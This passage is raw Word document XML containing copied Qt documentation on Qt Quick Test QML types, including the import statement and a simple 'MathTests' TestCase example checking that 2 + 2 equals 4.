        <w:r w:rsidR="00660D4F" w:rsidRPr="0090003B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qttest-qmlmodule.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00546121" w:rsidRPr="00546121" w:rsidRDefault="00546121" w:rsidP="00BA1CDE">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1558" w:name="_Toc483000868"/>
      <w:bookmarkStart w:id="1559" w:name="_Toc483003861"/>
      <w:bookmarkStart w:id="1560" w:name="_Toc483604213"/>
      <w:bookmarkStart w:id="1561" w:name="_Toc483605433"/>
      <w:r w:rsidRPr="00BA1CDE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick Test QML Types</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1558"/>
      <w:bookmarkEnd w:id="1559"/>
      <w:bookmarkEnd w:id="1560"/>
      <w:bookmarkEnd w:id="1561"/>
    </w:p>
    <w:p w:rsidR="00546121" w:rsidRPr="00546121" w:rsidRDefault="00546121" w:rsidP="00546121">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">You can </w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> this module using the following statement:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00546121" w:rsidRPr="00546121" w:rsidRDefault="00546121" w:rsidP="00546121">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:hyperlink r:id="rId1929" w:history="1">
        <w:r w:rsidRPr="00546121">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QtTest</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00546121" w:rsidRPr="00546121" w:rsidRDefault="00546121" w:rsidP="00546121">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For more information about how to use these types, see</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1930" w:history="1">
        <w:r w:rsidRPr="00546121">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick Test Reference Documentation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00660D4F" w:rsidRDefault="00490E7E" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1931" w:history="1">
        <w:r w:rsidR="00546121" w:rsidRPr="0090003B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtquick-qtquicktest.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00546121" w:rsidRPr="00BA1CDE" w:rsidRDefault="00546121" w:rsidP="00BA1CDE">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1562" w:name="_Toc483000869"/>
      <w:bookmarkStart w:id="1563" w:name="_Toc483003862"/>
      <w:bookmarkStart w:id="1564" w:name="_Toc483604214"/>
      <w:bookmarkStart w:id="1565" w:name="_Toc483605434"/>
      <w:r w:rsidRPr="00BA1CDE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick Test Reference Documentation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1562"/>
      <w:bookmarkEnd w:id="1563"/>
      <w:bookmarkEnd w:id="1564"/>
      <w:bookmarkEnd w:id="1565"/>
    </w:p>
    <w:p w:rsidR="00546121" w:rsidRPr="00546121" w:rsidRDefault="00546121" w:rsidP="00BA1CDE">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1566" w:name="introduction"/>
      <w:bookmarkStart w:id="1567" w:name="_Toc483000870"/>
      <w:bookmarkStart w:id="1568" w:name="_Toc483003863"/>
      <w:bookmarkStart w:id="1569" w:name="_Toc483604215"/>
      <w:bookmarkStart w:id="1570" w:name="_Toc483605435"/>
      <w:bookmarkEnd w:id="1566"/>
      <w:r w:rsidRPr="00BA1CDE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1567"/>
      <w:bookmarkEnd w:id="1568"/>
      <w:bookmarkEnd w:id="1569"/>
      <w:bookmarkEnd w:id="1570"/>
    </w:p>
    <w:p w:rsidR="00546121" w:rsidRPr="00546121" w:rsidRDefault="00490E7E" w:rsidP="00546121">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1932" w:history="1">
        <w:r w:rsidR="00546121" w:rsidRPr="00546121">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick Test</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00546121" w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00546121" w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">is a </w:t>
      </w:r>
      <w:r w:rsidR="00546121" w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>unit test framework for QML applications</w:t>
      </w:r>
      <w:r w:rsidR="00546121" w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Te</w:t>
      </w:r>
      <w:r w:rsidR="00546121" w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>st cases are written as JavaScript functions within a</w:t>
      </w:r>
      <w:r w:rsidR="00546121" w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1933" w:history="1">
        <w:r w:rsidR="00546121" w:rsidRPr="00546121">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>TestCase</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00546121" w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00546121" w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type:</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.3</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtTest</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.0</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TestCase</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</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pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    name</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w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"MathTests"</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pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> test_math</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w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</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pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        compare</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</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w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</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w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"2 + 2 = 4"</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</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pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</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pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> test_fail</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w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
